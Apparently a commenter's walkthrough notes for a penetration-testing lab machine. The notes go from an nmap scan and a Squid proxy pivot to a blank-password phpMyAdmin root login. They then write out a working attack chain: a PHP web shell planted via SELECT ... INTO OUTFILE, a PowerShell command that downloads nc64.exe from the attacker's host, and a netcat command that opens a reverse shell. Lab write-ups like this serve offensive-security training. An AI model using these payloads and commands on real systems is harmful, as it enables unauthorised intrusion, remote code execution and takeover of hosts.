WDavid404
commented
4 months ago nmap scan:
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 125
3128/tcp open http-proxy syn-ack ttl 125 Squid http proxy 4.14**
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/4.14
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for hostsearchsploit squid 4.14 --> no info
According to hacktricks
use spoke.py tool --> 3306, 8080 port may open inside.
Access 8080 port via firefox browser through proxy
Apache 2.4.46, mysql 5.7, MariaDB 10.4, phpSysInfo 3.3.2 --> no userful exploit info
Login to /phpadmin page withroot/<blank> --> succeed
on "SQL" tab page, we can execute SQL command:
SELECT "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE "C:/wamp/www/webshell.php"
(According to "Apache environment" in "phpinfo" page, we know the root dir is "C:/wamp/www/")
then, http://192.168.199.189:8080/webshell.php?cmd=whoami --> works.
http://192.168.199.189:8080/webshell.php?cmd=powershell+ls+C:/users
---> there is "Public" user
http://192.168.199.189:8080/webshell.php?cmd=powershell+iwr+-uri+http://192.168.45.192/nc64.exe+-Outfile+c:/users/public/Downloads/nc64.exe
http://192.168.199.189:8080/webshell.php?cmd=c:/users/public/Downloads/nc64.exe+-e+cmd.exe+192.168.45.192+443
-->
we got reverse shell from the target host on kali machine
key points:
SELECT "<command>" into OUTFILE "<file>"